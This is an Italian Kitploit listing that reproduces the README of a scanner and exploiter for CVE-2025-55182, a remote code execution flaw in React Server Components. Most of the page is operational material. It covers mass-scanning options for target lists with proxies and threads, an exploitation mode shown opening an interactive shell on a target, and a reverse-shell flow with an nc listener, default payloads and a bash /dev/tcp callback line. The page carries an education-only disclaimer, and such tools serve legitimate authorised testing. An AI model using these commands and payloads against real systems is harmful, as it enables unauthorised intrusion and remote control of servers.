Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — Scanner di vulnerabilità RCE critica per React Server Components (CVE-2025-55182). Framework automatizzato di sfruttamento con supporto multi-payload, capacità proxy ed esecuzione interattiva di comandi. | Kitploit
Strumenti/GitHubGitHub/alihzsec/cve-2025-55182
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubalihzsec/cve-2025-55182

CVE-2025-55182

Scanner di vulnerabilità RCE critica per React Server Components (CVE-2025-55182). Framework automatizzato di sfruttamento con supporto multi-payload, capacità proxy ed esecuzione interattiva di comandi.

Vedi Repository
15139 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 Scanner & Exploiter

[!Warning] Questo repository è destinato esclusivamente a scopi educativi e di ricerca.

  • Utilizza i PoC forniti esclusivamente su sistemi di tua proprietà o per i quali hai esplicita autorizzazione ai test.
  • L'accesso non autorizzato, lo sfruttamento o l'uso improprio di qualsiasi materiale in questo repository è illegale.
  • L'autore/gli autori non si assume/assumono alcuna responsabilità per eventuali danni, uso improprio o conseguenze legali derivanti da un uso improprio.

🔍 Panoramica

CVE-2025-55182 è una vulnerabilità critica di remote code execution che interessa le versioni 19.0.0, 19.1.0, 19.1.1 e 19.2.0 di React Server Components. Questa vulnerabilità deriva dalla deserializzazione non sicura dei payload delle richieste HTTP verso gli endpoint delle Server Function, consentendo a attaccanti non autenticati di eseguire codice arbitrario da remoto.


🐛 Dettagli della vulnerabilità

CVE ID: CVE-2025-55182
Versioni interessate:

  • react-server-dom-webpack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel 19.0.0, 19.1.0, 19.1.1, 19.2.0

🚀 Installazione

Prerequisiti

  • Python 3.8 o superiore
  • pip (gestore di pacchetti Python)

Configurazione

  1. Clona il repository
root@kitploit:~
git clone https://github.com/AliHzSec/CVE-2025-55182.git
cd CVE-2025-55182
  1. Crea un ambiente virtuale (consigliato)
root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
  1. Installa le dipendenze
root@kitploit:~
pip install -r requirements.txt

📖 Utilizzo

root@kitploit:~
python3 main.py [-h] (-d | -e) [-u URL] [-l LIST] [-p PROXY | -pl PROXY_LIST] [-t THREADS] [-s]

Argomenti

Argomenti

ArgomentoDescrizione
-d, --detectionEsegue in modalità rilevamento (scansiona per vulnerabilità)
-e, --exploitEsegue in modalità exploitation (sfrutta un singolo target)
-u, --url URLURL del target singolo da scansionare/sfruttare
-l, --list FILEFile contenente un elenco di URL target (solo modalità rilevamento)
-p, --proxy URLURL del proxy singolo (es., http://127.0.0.1:8080)
-pl, --proxy-list FILEFile contenente un elenco di URL proxy (uno per riga)
-t, --threads NNumero di thread concorrenti (default: 10, solo modalità rilevamento)
-s, --silentModalità silenziosa - mostra solo i target vulnerabili (solo modalità rilevamento)
-o, --output [FILE]Salva i target vulnerabili in un file (solo modalità rilevamento). Se non viene fornito un nome file, utilizza il default: CVE-2025-55182_Result_YYYYMMDD_HHMMSS.txt
--debugAbilita il logging di debug - mostra i dettagli della risposta e i tentativi di ripetizione (non disponibile in modalità silenziosa)

🎯 Modalità rilevamento

Scansiona un singolo target

root@kitploit:~
python3 main.py -d -u https://example.com

Scansiona più target da file

root@kitploit:~
python3 main.py -d -l targets.txt

Scansiona con proxy

root@kitploit:~
python3 main.py -d -l targets.txt -p http://127.0.0.1:8080

Modalità silenziosa (Mostra solo target vulnerabili)

root@kitploit:~
python3 main.py -d -l targets.txt -s

Scansione multi-thread

root@kitploit:~
python3 main.py -d -l targets.txt -t 20

💣 Modalità exploitation

Shell interattiva

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Poi seleziona [i] per la shell interattiva:

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): i

shell> whoami
ec2-user

shell> id
uid=1000(ec2-user) gid=1000(ec2-user) groups=1000(ec2-user)

shell> ls -la
total 48
drwxrwxr-x 5 user user 4096 Dec 7 10:00 .
drwxr-xr-x 3 root root 4096 Dec 1 08:00 ...
...

shell> exit

Reverse shell

root@kitploit:~
python3 main.py -e -u https://vulnerable-site.com

Poi seleziona [r] per la reverse shell e scegli il tipo di payload:

Opzione 1: Payload predefiniti (Consigliato)

root@kitploit:~
Choose exploitation method:
  [i] Interactive shell
  [r] Reverse shell

Enter your choice (i/r): r

Choose payload option:
  [d] Use default payloads (Try multiple reverse shells)
  [c] Provide custom payload

Enter your choice (d/c): d

Enter your IP and port in this format:
Example: 192.168.1.100:4444

IP:PORT> 192.168.1.100:4444

Setup your listener with this command:
nc -lvnp 4444

Press ENTER when your listener is ready...

Lo strumento proverà automaticamente 17+ diversi payload di reverse shell fino a quando uno non avrà successo.

Opzione 2: Payload personalizzato

root@kitploit:~
Enter your choice (d/c): c

Enter your custom reverse shell payload:
payload> bash -i >& /dev/tcp/10.0.0.1/4444 0>&1

📚 Riferimenti

  • Avviso di sicurezza ufficiale di React
  • Avviso di sicurezza di Meta
  • Avviso di sicurezza di Vercel
  • Avviso di sicurezza di Next.js
  • Dettagli CVE

Se trovi utile questo strumento, considera di mettere una stella! ⭐
Realizzato con ❤️ per la community della sicurezza
Scarica lo strumento